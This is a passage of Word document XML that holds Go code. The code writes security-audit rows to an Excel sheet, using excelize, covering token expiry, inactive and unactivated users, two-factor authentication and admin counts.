    <w:p w14:paraId="7F536FD5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF64566" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D14030" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E9814A7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// PAT(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个人访问令牌</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最大生存时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5D32BF" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11708854" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>pat_expire_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252AC82C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>pat_expire := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754E08A9" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.PATExpire.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAF42F0" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A7E1A7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.PATExpire.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E88B628" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.PATExpire.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC10B5A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.PATExpire.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DD47F9" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.PATExpire.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111EF1DA" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.PATExpire.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B30FC3A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51493A93" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, pat_expire_name, &amp;pat_expire)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0158FCD6" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE852A4" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B7408F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6534913A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB451C3" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>统计不活跃用户数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB16AB4" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D572C18" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>inactive_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7443711A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>inactive := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A56F139" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Inactive.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5470FE6F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDDC34A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Inactive.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F99B4FE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Inactive.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C13637" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Inactive.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D498977" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Inactive.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592B5785" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Inactive.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC9797B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424660AA" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, inactive_name, &amp;inactive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F732B3" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4660C7CE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DE0E52" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D80328" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47FDE52E" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>统计未启用账户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724DF2C5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33676056" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>unactive_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE784F5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>unactive := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE469F2" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Unactive.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C13292" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BDD3B8" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Unactive.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B701B07" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Unactive.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C9A593" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Unactive.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E1BD91" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Unactive.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3209E3" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Unactive.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB23BBB" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AA5A76" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, unactive_name, &amp;unactive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475D3F80" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F59FB26" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A04BEFE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431FD61D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3765E715" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>统计开启双因素认证用户数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5EF495" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D9DDCE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>two_factor_auth_user_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151F1456" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>two_factor_auth_user := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645BDB51" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.TwoFactorAuth.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F9957B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE86E78" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.TwoFactorAuth.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE2C2D2" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C58A1DF" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.TwoFactorAuth.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F46A899" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.TwoFactorAuth.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BEE573" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.TwoFactorAuth.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A754DE3" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2139C087" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, two_factor_auth_user_name, &amp;two_factor_auth_user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9BC453" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C7705A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2E227B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EDB735" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="459A1CA8" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>统计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数量并打印名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444A3FE8" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F82902E" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>admin_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE219F0" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>admin := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4309F550" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Admin.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7014D1E8" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C594EF" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Admin.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEF8524" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Admin.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED39AA3" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Admin.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E0098C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Admin.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDB31C0" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.User.Admin.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6310702F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ACA853" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, admin_name, &amp;admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C2252F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D195C48" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
